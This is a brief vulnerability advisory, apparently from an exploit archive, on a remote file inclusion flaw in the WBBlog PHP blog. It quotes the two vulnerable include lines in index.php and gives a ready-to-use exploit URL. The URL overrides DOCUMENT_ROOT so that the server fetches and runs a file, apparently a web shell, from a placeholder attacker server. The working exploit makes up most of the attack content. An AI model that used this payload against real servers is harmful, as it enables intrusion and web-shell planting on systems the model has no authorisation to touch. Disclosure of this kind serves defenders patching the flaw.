WBBlog suffers from a remote file inclusion vulnerability.
f2a6735dabf275055d3a25a0184dc4849d25f16374750ce5ec63e4825f3e9052
view source
print?
#################################################################
#
# WBBlog Remote File Inclusion Vulnerability
# Found By: mr_me
# Download: http://liqua.com/post/WBBlog.html
# Tested On: Linux
# Note: For educational purposes only
#
#################################################################
Remote file include in index.php on lines 25 and 26
8<-------------------------------------snip-------------------------------------8<
include($_SERVER['DOCUMENT_ROOT'].'/wbblog/inc/config.inc.php');
include($_SERVER['DOCUMENT_ROOT'].'/wbblog/inc/init.inc.php');
8<-------------------------------------snip-------------------------------------8<
exploit:
http://[server]/wbblog/index.php?_SERVER[DOCUMENT_ROOT]=http://[evil server]/c100.txt?